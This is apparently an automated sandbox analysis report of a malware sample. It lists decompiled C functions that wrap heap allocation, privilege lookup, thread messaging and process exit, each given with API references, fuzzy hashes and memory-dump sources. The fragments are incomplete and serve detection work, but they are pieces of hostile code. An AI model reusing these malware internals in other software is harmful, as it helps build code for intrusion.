Opcode Fuzzy Hash: 3a37d7f4a2bd6e126770f94e87872fbe5b3ff73f4c2452d43913f1094de6450a
Instruction Fuzzy Hash: D590027120214402D211659A5408656014597E0381F61D021A9414555EC6A58C91B171

Uniqueness

Uniqueness Score: -1.00%

Function 004088A0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 004184B3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E004184B3(void* __eax, void* __ebx, void* __ecx, char _a4, void* _a8, long _a12, void* _a16) {
				void* __esi;
				void* __ebp;
				long _t12;
				intOrPtr* _t16;
				void* _t17;
				intOrPtr* _t18;

				asm("cli");
				 *((intOrPtr*)(__eax - 3)) =  *((intOrPtr*)(__eax - 3)) - __ch;
				if(__ebx >= 0) {
					_t12 = _a12;
					_t16 =  *_t18;
					return  *_t16(_t12, _t17);
				} else {
					__ebp = __esp;
					__eax = _a4;
					_t6 = __eax + 0xc74; // 0xc74
					__esi = _t6;
					__eax = _a12;
					__eax = RtlFreeHeap(_a8, _a12, _a16); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}

0x004184b8
0x004184b9
0x004184be
0x0041846f
0x00418472
0x0041847d
0x004184c0
0x004184c1
0x004184c3
0x004184cf
0x004184cf
0x004184df
0x004184ed
0x004184ef
0x004184f0
0x004184f1
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Strings

hA, xrefs: 00418477

Memory Dump Source

Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID: hA
API String ID: 3298025750-1221461045
Opcode ID: 7469df7ec6a77a1edc060834f8bdcad83b67fc0fc28a52e12e00ccd48e24ec80
Instruction ID: ffd031af30fc9d79428cd87130106979de4dff56f81df849e5a63315afddfdf0
Opcode Fuzzy Hash: 7469df7ec6a77a1edc060834f8bdcad83b67fc0fc28a52e12e00ccd48e24ec80
Instruction Fuzzy Hash: 49F05EB12043046FDB14EFADDC49DEBB7ACEF84754F04855AFA4997241DA31E910CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 004184F2, Relevance: 3.1, APIs: 2, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E004184F2(signed int __eax, signed int __ebx, signed int __ecx, intOrPtr* __esi, intOrPtr _a4, int _a8, long _a12, void* _a16) {
				void* _t19;
				long _t20;
				char _t25;
				intOrPtr* _t29;
				void* _t32;
				void* _t35;
				void* _t44;

				asm("in al, 0xb6");
				asm("popad");
				asm("lodsd");
				_t1 = __eax - 0x28;
				 *_t1 =  *(__eax - 0x28) << __ecx;
				_t19 = _t44;
				if( *_t1 <= 0) {
					_t13 = __eax;
					__eax = __esi;
					__esi = _t13;
					_push(0x8b55d514);
					__eax = _a4;
					__ecx =  *((intOrPtr*)(__eax + 0xa14));
					_push(__esi);
					__esi = __eax + 0xc7c;
					__eax =  *__esi;
					ExitProcess(_a8);
				}
				asm("cli");
				 *((intOrPtr*)(_t19 - 3)) =  *((intOrPtr*)(_t19 - 3)) - __ecx;
				if((__ebx ^ __eax) >= 0) {
					_t20 = _a12;
					_t29 =  *((intOrPtr*)(__esi));
					return  *_t29(_t20, _t32);
				} else {
					_t22 = _a4;
					_push(__esi);
					_t9 = _t22 + 0xc74; // 0xc74
					E00418DB0(_t35, _a4, _t9,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
					_t25 = RtlFreeHeap(_a8, _a12, _a16); // executed
					return _t25;
				}
			}

0x004184f2
0x004184f4
0x004184f5
0x004184f6
0x004184f6
0x004184f9
0x004184fa
0x004184fc
0x004184fc
0x004184fc
0x00418500
0x00418503
0x00418506
0x0041850c
0x00418512
0x00418522
0x00418528
0x00418528
0x004184b8
0x004184b9
0x004184be
0x0041846f
0x00418472
0x0041847d
0x004184c0
0x004184c3
0x004184c9
0x004184cf
0x004184d7
0x004184ed
0x004184f1
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitFreeHeapProcess
String ID:
API String ID: 1180424539-0
Opcode ID: 42889d04b92158c91890e94a056bc5d41d4a7bc5055b6d19472d6eb65e0f7b6c
Instruction ID: 7a7b31b2ff38667f18bd121c8ea353899aee7557a9537c5999e4d04069fe05b5
Opcode Fuzzy Hash: 42889d04b92158c91890e94a056bc5d41d4a7bc5055b6d19472d6eb65e0f7b6c
Instruction Fuzzy Hash: 540171712002146FD724DFA9CC89EDB77A89F89750F108569FA499B382DA30E9018AE4

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				L00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t12 = E00409B10(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = L00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407260
0x0040726f
0x00407273
0x0040727e
0x0040728e
0x0040729e
0x004072a3
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418613, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00418613(void* __eax, void* __edx, void* __esi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t23;
				void* _t32;
				void* _t34;
				short* _t35;

				asm("lock into");
				_t34 = __esi - 1;
				if(_t34 < 0) {
					_t15 = _a8;
					_t35 =  &(_a8[0x648]);
					E00418DB0(_t32, _a8, _t35,  *((intOrPtr*)(_t15 + 0xa18)), 0, 0x47);
					return  *( *_t35)(_a12, _a16, _t34);
				} else {
					asm("aad 0x41");
					 *(__edx + 0x7b) =  !( *(__edx + 0x7b));
					asm("arpl [ebp-0x75], dx");
					_t20 = _a4;
					_push(_t34);
					E00418DB0(_t32, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t20 + 0xa18)), 0, 0x46);
					_t23 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
					return _t23;
				}
			}

0x00418613
0x00418615
0x00418616
0x00418663
0x00418672
0x0041867a
0x00418690
0x00418618
0x00418618
0x0041861b
0x0041861f
0x00418623
0x0041862c
0x0041863a
0x00418650
0x00418654
0x00418654

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 31f0a129261cd33b100c1778542410d3142e1cff176ccc205ec9e2f5ebc42cde
Instruction ID: 7f7508aad84286ad71e3ebe43307837e1acc198c442f721a51bec9a598e9ecf7
Opcode Fuzzy Hash: 31f0a129261cd33b100c1778542410d3142e1cff176ccc205ec9e2f5ebc42cde
Instruction Fuzzy Hash: 06017CB1600204BFDB14DF94DC85FEB77A8EF85350F104569FA0DAB281CA34A9508BE4

Uniqueness

Uniqueness Score: -1.00%

Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				L00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				L00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418497
0x004184ad
0x004184b1

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Memory Dump Source

Source File: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				L00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041863a
0x00418650
0x00418654

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418500(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				L00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418503
0x0041851a
0x00418528

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5

Uniqueness

Uniqueness Score: -1.00%

Function 009D967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009D9694

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 53662d24fe664d3bec27704840f744e0213dfc77c9050733dbe3b2bd756b4cb7
Instruction ID: 2892d63dd41b5f58d73e56a562f917afef8fa8b4147951bd02fc0c65b4133e61
Opcode Fuzzy Hash: 53662d24fe664d3bec27704840f744e0213dfc77c9050733dbe3b2bd756b4cb7
Instruction Fuzzy Hash: 51B09B719425C5C5D711E77146087277A4477D0745F66C062D1420655A4778C891F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 009D98A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef33b4a972ffe4d3f56f839afb52c82997245957da713689b356d0912330959d
Instruction ID: ed403023fb1c7e8ef494573af84d5d4fb739200afd1d31f7ac1cf42dea0c181c
Opcode Fuzzy Hash: ef33b4a972ffe4d3f56f839afb52c82997245957da713689b356d0912330959d
Instruction Fuzzy Hash: 2C90026130214402D213615A44146160149D7D13C5FA1C022E5814555D86658D53F172

Uniqueness

Uniqueness Score: -1.00%

Function 009D9820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac48d1ce9a8224369a56ad19bc9c11909a98560b88a9a0e50f29fcce495929c8
Instruction ID: 642aea77ea14e52028a9c1a515f1856b4064e4d67dba59ec62c834e0afc6a612
Opcode Fuzzy Hash: ac48d1ce9a8224369a56ad19bc9c11909a98560b88a9a0e50f29fcce495929c8
Instruction Fuzzy Hash: A190027124214402D252715A44046160149A7D03C1FA1C022A4814554E86958E56FAA1

Uniqueness

Uniqueness Score: -1.00%

Function 009DB040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8954b35236ab22bdb567aebd88c0e7c12c1e0fef654a6268f343d812ba18cc3
Instruction ID: 80315188bbe52cb799c96962d400d2d22f95844abadf0a4166469f5f1a4d7f3b
Opcode Fuzzy Hash: e8954b35236ab22bdb567aebd88c0e7c12c1e0fef654a6268f343d812ba18cc3
Instruction Fuzzy Hash: B49002A1602280434651B15A48044165155A7E13813A1C131A4844560C86A88C55E2A5

Uniqueness

Uniqueness Score: -1.00%

Function 009D99D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 263f8443fd83a2d9cb7914777d21e3316c3a17885ca75682073491f551f6d3f2
Instruction ID: d0db1b20daa3a74abe98e8fa8a304560ff7c694ca990676759f86c56d2600e90
Opcode Fuzzy Hash: 263f8443fd83a2d9cb7914777d21e3316c3a17885ca75682073491f551f6d3f2
Instruction Fuzzy Hash: DA9002A121214042D215615A4404716018597E1381F61C022A6544554CC5698C61A165

Uniqueness

Uniqueness Score: -1.00%

Function 009D95F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd79e5967df4ed96f2d00a55cb10f2d6912279fc22f74527c5246ad692be2bc7
Instruction ID: fb845b4653cce9ed44b90d97e7ce09dce98a6904437fa4d32659a46e9fe1af47
Opcode Fuzzy Hash: cd79e5967df4ed96f2d00a55cb10f2d6912279fc22f74527c5246ad692be2bc7
Instruction Fuzzy Hash: AB90027120214802D215615A4804696014597D0381F61C021AA414655E96A58C91B171

Uniqueness

Uniqueness Score: -1.00%

Function 009DAD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30eba1ea1a49aafdba698d782371158642c603fa155bd3e9c4c3cb34fc38a995
Instruction ID: 4d8c44683522fc3dfd257e13f6ad949c69dd925fda80af8c35b59d58441d3dd4
Opcode Fuzzy Hash: 30eba1ea1a49aafdba698d782371158642c603fa155bd3e9c4c3cb34fc38a995
Instruction Fuzzy Hash: 90900271A06140129251715A48146564146A7E07C1B65C021A4904554C89948E55A3E1

Uniqueness

Uniqueness Score: -1.00%

Function 009D9520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d6cb21e408c63f63d5473f893cdf26ad5c3ba6ed2c61e6cc0cab51d0783e5ef
Instruction ID: ced2f8239e372936653ca9c34500bfd6c125cad5e50eb0137ef8b63318a1bb3a
Opcode Fuzzy Hash: 5d6cb21e408c63f63d5473f893cdf26ad5c3ba6ed2c61e6cc0cab51d0783e5ef
Instruction Fuzzy Hash: 939002E1202280924611A25A8404B1A464597E0381B61C026E5444560CC5658C51E175

Uniqueness

Uniqueness Score: -1.00%

Function 009D9950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e60c8d185a38353021dcb73ecc33dd4e384a137bccc8b8715694fb40f377c448
Instruction ID: 087d1ee30ad4779738776707a9ad304cfbfec0f55e504892bb896a682a5d60e8
Opcode Fuzzy Hash: e60c8d185a38353021dcb73ecc33dd4e384a137bccc8b8715694fb40f377c448
Instruction Fuzzy Hash: 0F9002A120254403D251655A4804617014597D0382F61C021A6454555E8A698C51B175

Uniqueness

Uniqueness Score: -1.00%

Function 009D9560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9293b0c567ce8d6dcabe4577ffd2fc3dcc8636ebb6592b455007bfa61064c7be
Instruction ID: 11ffcc4ee52aeee07b3093bb2453fd1559df86f304da06b4f7b6b944fe773901
Opcode Fuzzy Hash: 9293b0c567ce8d6dcabe4577ffd2fc3dcc8636ebb6592b455007bfa61064c7be
Instruction Fuzzy Hash: 24900265222140020256A55A060451B0585A7D63D13A1C025F5806590CC6618C65A361

Uniqueness

Uniqueness Score: -1.00%

Function 009D9A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f23bc152f3585e516be0f51d49f9bed269dd7a5a5b5cada4a4f33983476604c
Instruction ID: 1d078d8ad77504a15cdf081bc6878710b999da75dbd82cfe0a6e26aa7d3ad4ca
Opcode Fuzzy Hash: 1f23bc152f3585e516be0f51d49f9bed269dd7a5a5b5cada4a4f33983476604c
Instruction Fuzzy Hash: 0990026120258442D251625A4804B1F424597E1382FA1C029A8546554CC9558C55A761

Uniqueness

Uniqueness Score: -1.00%

Function 009D96D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df292194f415b54a20a2cd88b300eb21d05835286ab189dd79c72fc0bf6bc25
Instruction ID: f6bbe250fe7b07be2ec19043eea7ad9f1b1e80069089951e9171b76e04fc7182
Opcode Fuzzy Hash: 1df292194f415b54a20a2cd88b300eb21d05835286ab189dd79c72fc0bf6bc25
Instruction Fuzzy Hash: CE90027120214842D211615A4404B56014597E0381F61C026A4514654D8655CC51B561

Uniqueness

Uniqueness Score: -1.00%

Function 009D9A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a57d88bb9a5f6b0dac2c5e87f4a049bf5f6918167d9cf9cfbd85f717390497f
Instruction ID: 7a7c7c5563c75e3696fe8c927bd2dc942b0a7f833eb9adf2b2ee856ea88e72ba
Opcode Fuzzy Hash: 4a57d88bb9a5f6b0dac2c5e87f4a049bf5f6918167d9cf9cfbd85f717390497f
Instruction Fuzzy Hash: 8A90027120254402D211615A4808757014597D0382F61C021A9554555E86A5CC91B571

Uniqueness

Uniqueness Score: -1.00%

Function 009D9610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02ac9c711f3644ee7e1dfbc3b7966b0955cf863e86e13f63d828cf34592fe601
Instruction ID: 993f40ad9a1477f7234e2e019c5cb11e40bb540ffb703efb7dc228099dec1fdb
Opcode Fuzzy Hash: 02ac9c711f3644ee7e1dfbc3b7966b0955cf863e86e13f63d828cf34592fe601
Instruction Fuzzy Hash: FF90027160614802D261715A4414756014597D0381F61C021A4414654D87958E55B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 009D9650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7deb666d0aaf3118d32ceda6ba80d60458089ca7f85e0896bf88930a7107515
Instruction ID: db83f53c84fe2cecc58e31dc4cc3ca1058e29122183c0ae2c9458a06b667460a
Opcode Fuzzy Hash: c7deb666d0aaf3118d32ceda6ba80d60458089ca7f85e0896bf88930a7107515
Instruction Fuzzy Hash: 3D90027120618842D251715A4404A56015597D0385F61C021A4454694D96658D55F6A1

Uniqueness

Uniqueness Score: -1.00%

Function 009DA3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84545cd4aeedc4ef23bf99d8ada4f8a82d298225ece2f5941e1d241395f67288
Instruction ID: c8bf54a316f4bdde13ab6c4db1985b51c4c89a7d7204f0fb4a973feccf6103a8
Opcode Fuzzy Hash: 84545cd4aeedc4ef23bf99d8ada4f8a82d298225ece2f5941e1d241395f67288
Instruction Fuzzy Hash: 3290027120258002D251715A844461B5145A7E0381F61C421E4815554C86558C56E261

Uniqueness

Uniqueness Score: -1.00%

Function 009DA710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afdab09f39a0dc87cc5fd82091cb8be4378a29da8f9e779d2d6f5b2f25f2c45f
Instruction ID: 272a022a0631d68baadcf439825f3554ceed875f94fac419f0be8e50bdc8cfef
Opcode Fuzzy Hash: afdab09f39a0dc87cc5fd82091cb8be4378a29da8f9e779d2d6f5b2f25f2c45f
Instruction Fuzzy Hash: 02900271302140529611A69A5804A5A424597F0381B61D025A8404554C85948C61A161

Uniqueness

Uniqueness Score: -1.00%

Function 009D9B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25dad22841eea99ce02de5a5b3123f0bd10d8a4f54256d6a74d5f200f0f367f2
Instruction ID: 8db94153eb7307318d813bc01751a81a8029d188667535e73facb8665319ae64
Opcode Fuzzy Hash: 25dad22841eea99ce02de5a5b3123f0bd10d8a4f54256d6a74d5f200f0f367f2
Instruction Fuzzy Hash: 3590026124214802D251715A84147170146D7D0781F61C021A4414554D86568D65B6F1

Uniqueness

Uniqueness Score: -1.00%

Function 009D9730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8db7d29c0b882e4406e73d83c126a74cd30bc5e1ead91fdaf6c26d0241444d9
Instruction ID: 02f02f69db76d0b0644a96220e16910a2ae91fd86e565be855f2e03e7992a5a6
Opcode Fuzzy Hash: c8db7d29c0b882e4406e73d83c126a74cd30bc5e1ead91fdaf6c26d0241444d9
Instruction Fuzzy Hash: 2190026160614402D251715A5418716015597D0381F61D021A4414554DC6998E55B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 009D9770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84a062c04169d84d42d0d7dcdcdd4c7699e5934da6f20c5fc6519853c52a3e22
Instruction ID: 7e530b6e0e053b1b84ce5f28037c00378bcc1c2c80c1687246e2dedf3ada33f1
Opcode Fuzzy Hash: 84a062c04169d84d42d0d7dcdcdd4c7699e5934da6f20c5fc6519853c52a3e22
Instruction Fuzzy Hash: C490026120618442D211655A5408A16014597D0385F61D021A5454595DC6758C51F171

Uniqueness

Uniqueness Score: -1.00%

Function 009DA770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86976c4e254330a6c73a942e7fc0d408bd5f0ad712a87800c2e32730c038f472
Instruction ID: a1a9c5639a84299834827bb12f533bd9511f8ea8d6fab0df3e8ff2876ebe8ee8
Opcode Fuzzy Hash: 86976c4e254330a6c73a942e7fc0d408bd5f0ad712a87800c2e32730c038f472
Instruction Fuzzy Hash: 9590027520618442D611655A5804A97014597D0385F61D421A481459CD86948C61F161

Uniqueness

